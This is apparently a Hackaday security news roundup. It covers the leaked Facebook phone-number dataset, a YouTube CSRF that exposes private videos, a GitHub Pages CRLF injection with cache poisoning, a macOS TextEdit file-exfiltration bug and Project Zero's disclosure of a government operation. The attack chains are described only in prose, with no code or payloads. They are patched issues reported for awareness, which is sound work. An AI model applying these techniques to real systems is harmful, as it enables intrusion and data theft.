Header Ads

This Week in Security: The Facebook Leak, The YouTube Leak, and File Type Confusion

Facebook had a problem, way back in the simpler times that was 2019. Something like 533 million accounts had the cell phone number associated with the account leaked. It’s making security news this week, because that database has now been released for free in its entirety. The dataset consists of Facebook ID, cell number, name, location, birthday, bio, and email address. Facebook has pointed out that the data was not a hack or breach, but was simply scraped prior to a vulnerability being fixed in 2019.

The vulnerability was in Facebook’s contact import service, also known as the “Find Friends” feature. The short explanation is that anyone could punch a random phone number in, and get a bit of information about the FB account that claimed that number. The problem was that some interfaces to that service didn’t have appropriate rate limiting features. Combine that with Facebook’s constant urging that everyone link a cell number to their account, and the default privacy setting that lets anyone locate you by your cell number, and the data scraping was all but inevitable. The actual technique used may have been to spoof that requests were coming from the official Facebook app.

[Troy Hunt]’s Have i been pwned service has integrated this breach, and now allows searching by phone number, so go check to see if you’re one of the exposed. If you are, keep the leaked data in mind every time an email or phone call comes from someone you don’t know.

Impersonating a TV

[David Schütz] was at a friend’s house, and pulled out his phone to show off a private YouTube video. Google has worked hard to make the Android/Chromecast/Android TV interconnect seamless, and that system was firing on all cylinders. With a simple button press, that private video played on his friend’s smart TV, and it seemed very wrong that this was so easy.

For background, YouTube videos can exist in three states. A normal video shows up for everyone, and there are no restrictions on watching it. An unlisted video doesn’t show up in search results or on the channel’s page. You have to have the link to see it. The third option is a private video. These aren’t visible to anyone, even if they have the direct link. To share a private video, the viewers have to be on the list of allowed viewers. Not on the list? No video for you. So how did a smart TV, that wasn’t signed in to an authorized account, manage to play the private video? The magic is a token that is generated when a user initiates the process. This “ctt” token serves as a single purpose authenticator, allowing the TV to play the user’s private video.

This is a reasonable system, so long as everything was implemented securely. Spoilers: It wasn’t. The problem was a Cross-Site Request Forgery vulnerability. The magic token is intended to only be generated when a user is requesting it from YouTube. Because that intention wasn’t enforced, any site can request a token, so long as the video ID is known. Not only does the “cast to TV” process work with individual videos, it works with playlists, and it turns out that every YouTube account has a semi-hidden playlist consisting of every upload.

The attack flow goes like this: The victim visits the malicious website, and that site sends off a request for the user’s “uploads” playlist. Since the victim is logged in to YouTube, and the request is coming from their browser, the request is honored. Once the video IDs are known, a ctt token can be generated for each. And with that, the attacker has access to every video on the victim’s account, even the private ones. The fix was to implement proper CSRF protection, and restrict access to the API to the official client. PoC Demo below:

CRLF to Access Private Pages

GitHub offers more than just code hosting. They also host GitHub pages, and one of the features offered there is private pages. You can put together a web interface that uses GitHub accounts as authorization. Set up your organization with different roles, and you can restrict the page to users with the appropriate role. GitHub is very interested in keeping those pages secure, so private pages is one of the areas they offer bug bounties for exploits.

[Robert Chen] had a very boring junior year of high school, thanks to COVID, and took up vulnerability hunting as a hobby. He started looking at GitHub, and discovered a quirk. The authentication process sends a page_id value, and that value is embedded in the response. He discovered that he could use url encoding to embed whitespace in the value. The authentication process would succeed, but the resulting page included the whitespace. This usually means that the value is processed by a toInt() function, but the raw, user-generated value is getting passed on. It’s better practice to convert the integer back to a string, and use that as a known-trustworthy value.

The attack is to embed a script tag in that ID, in such a way that the authentication logic still succeeds, but you have code that runs on the victim’s page. This accomplished by a series of Carriage Returns and Line Feeds (CRLF), followed by an encoded null value. The toInt() function stops processing as soon as it sees the null, but the payload is still passed on. The next step was taking advantage of inconsistent case sensitiveness. One part of the process sees “__HOST” and “__Host” as identical.

The last piece of the puzzle is cache poisoning. GitHub makes use of caching in the authentication flow, and without the above issues, it would be reasonably secure. The cache lookup is based on the results of toInt(), so if an attacker’s malicious request is the one that populated the cache, every visitor could potentially run the embedded script. His research netted him a nice $35,000, and Github has cleaned up the problems within a month.

When a txt File Is HTML

How does an OS determine what to do with a given file? The primary two approaches are the filename extension, and the contents of the file. And some times, the exact response is determined by the combination of both. It’s potentially complicated, and such complications can give rise to security issues. Case in point, CVE-2019-8761. As you might notice from the year embedded in the CVE, [Paulos Yibelo] didn’t get into a huge hurry to publish his work. That aside, this CVE is all about how MacOS handles .txt files that contain HTML code.

TextEdit is the default program used to open a text document, but it has support for bold text, different text colors, etc. In short, there’s more going on than raw text editing. The question then becomes, how much will TextEdit let you get away with? Quite a bit. If that text file starts out with , TextEdit parses the HTML rather than letting the user edit it. It’s not quite broken enough to run JavaScript, but there are still some shenanigans to be had. Inside a pair of CSS tags, it’s possible to import an external style script. While that imported script is external to the .txt file, it is still limited to the local filesystem. This would be the end of the story, and the most we could do is something mischievous like including /dev/urandom, crashing the machine.

MacOS has an interesting feature, called AutoFS, which allows auto-mounting remote locations onto the local filesystem. This feature doesn’t require any special privileges, so it’s easy enough to include a file from a remote server that you control. That’s enough to do something interesting. [Paulos] drops a casual bombshell: He also happened to find a way for a website to automatically download a .txt file and open it without any user interaction. So armed with this knowledge, an attacker could host a simple text file on a TOR server, and collect the real IP addresses of each visitor.

If that wasn’t enough, a bit of trickery with an unclosed style tag allows our rogue text file to reference the contents of a local file as part of the request. The result is that any file the TextEdit process can read, it can also upload to the attacker. The final MacOS quirk to make this even more interesting? Mac’s Gatekeeper, the part of the OS that tries to prevent running potentially malicious code, totally ignores txt files. [Paulos] privately reported his finding to Apple in 2019, and he believes it was fixed in 2019 or early 2020.

Google’s Hard Decision Ends an Op

A couple weeks ago, news broke about who was behind a series of attacks covered by Google’s Project Zero. The attacks in question were a counter-terrorism operation run by a western government. Google discovered the attack, reverse-engineered the vulnerabilities, and made it public without providing any details about who was behind it. It’s become controversial, because this action likely killed the op before it got results. It raises an interesting question: What are the responsibilities of a researcher when he finds a vulnerability being used by a friendly government? When the researcher believes in the mission of the operation in question, even?

Google seems to have taken a justice-is-blind sort of approach. If they find the attack happening, they respond the same way, regardless of who is behind it. I suspect that this is based partly on the assumption that if Google has detected and reverse-engineered the attack, so have the usual suspects. If they sit on the findings, the op can happen, but APT groups from less friendly countries could reverse engineer and use the exploits as well. What do you think Hackaday, should Project Zero sit on vulnerabilities if a friendly government is behind the exploits? [Editor’s bonus question: Should “friendly” governments, tasked with protecting the security of their own citizen’s Internet, sit on vulnerabilities? If “yes”, with what oversight?] Let us know what you think about that and the rest of the stories below!


No comments